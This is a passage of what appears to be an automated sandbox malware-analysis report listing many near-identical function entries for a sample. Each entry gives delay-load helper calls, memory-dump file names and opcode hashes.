                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 45d7146f1daaccabf52715a239108bede93fff4a199fbaee2a35c42794bf0eda
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 45d7146f1daaccabf52715a239108bede93fff4a199fbaee2a35c42794bf0eda
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1a8f26d1c3897cbf9db2521555d10cb4fe161df9f8b56fecf6661a179de1c99a
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 1a8f26d1c3897cbf9db2521555d10cb4fe161df9f8b56fecf6661a179de1c99a
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 16d3449552b6e888ed2ea3df9ca1ae62c1fa9774f84e32ecddcc16b2d588aa67
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 16d3449552b6e888ed2ea3df9ca1ae62c1fa9774f84e32ecddcc16b2d588aa67
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6ba254cbc8d9ff901e2dc06b14aecade74820925357748f444f4146b2a4f160d
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 6ba254cbc8d9ff901e2dc06b14aecade74820925357748f444f4146b2a4f160d
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0ae84ea56880be6541afa7a2674311b9f1751139b6eec292b330cfc0b28c753d
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 0ae84ea56880be6541afa7a2674311b9f1751139b6eec292b330cfc0b28c753d
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: af81b81e7e4db1ba4568a288195cde7cfce6b1fab79ccf9d64bfa7d5d0b7f22a
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: af81b81e7e4db1ba4568a288195cde7cfce6b1fab79ccf9d64bfa7d5d0b7f22a
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 72b31a06ec2b4260a6c0244b6be8f492cb1e732aa4fd2da91bbb0e753e0f484b
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 72b31a06ec2b4260a6c0244b6be8f492cb1e732aa4fd2da91bbb0e753e0f484b
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 573716a586ba244d43513146a99766071c496c3b9d6de8d9586c00fd8ac207c5
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 573716a586ba244d43513146a99766071c496c3b9d6de8d9586c00fd8ac207c5
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5ca0a27f36581656f80234cc599508fd977e61da37dd63184d600292a18d38d3
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 5ca0a27f36581656f80234cc599508fd977e61da37dd63184d600292a18d38d3
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1a589840656cefafa5993e6e1fcd3d0fc59b5fc270246d100a712d23945f6622
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 1a589840656cefafa5993e6e1fcd3d0fc59b5fc270246d100a712d23945f6622
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 57f7916ae9bbbdf88ff5a926959256719f014d591467ccfae2012139c8f1408c
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 57f7916ae9bbbdf88ff5a926959256719f014d591467ccfae2012139c8f1408c
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  Function 0018DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 28ae7ef3181ba9b46b24d0115212f8bd1b42a9a5e9c71dbd96f4795faee4b95d
                  • Instruction ID: d7809cf75d41f7636ba50c8e151aaa7872d83fc1ae5e4d426c7f736eaf26e57f
                  • Opcode Fuzzy Hash: 28ae7ef3181ba9b46b24d0115212f8bd1b42a9a5e9c71dbd96f4795faee4b95d
                  • Instruction Fuzzy Hash: 7EA012D526C2013C300C7142BC02C3A031CC1D0B11330410AB006900C5574009051D31
                  Function 0018DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1f6c9cf14b1332bd2a715ef9028274bea2e2d3474f22d684c6e7df694e2c2858
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 1f6c9cf14b1332bd2a715ef9028274bea2e2d3474f22d684c6e7df694e2c2858
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  Function 0018DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4307a8d669144cbae520c09d6ab8fe0ba3d0eda0ba8ad8b6e6728dd801e969b5
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 4307a8d669144cbae520c09d6ab8fe0ba3d0eda0ba8ad8b6e6728dd801e969b5
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  Function 0018DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 37a77709eb4e4947a8d8b2ced898184adf5994f46411cd89b3812ccee9ee6040
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 37a77709eb4e4947a8d8b2ced898184adf5994f46411cd89b3812ccee9ee6040
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  Function 0018DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
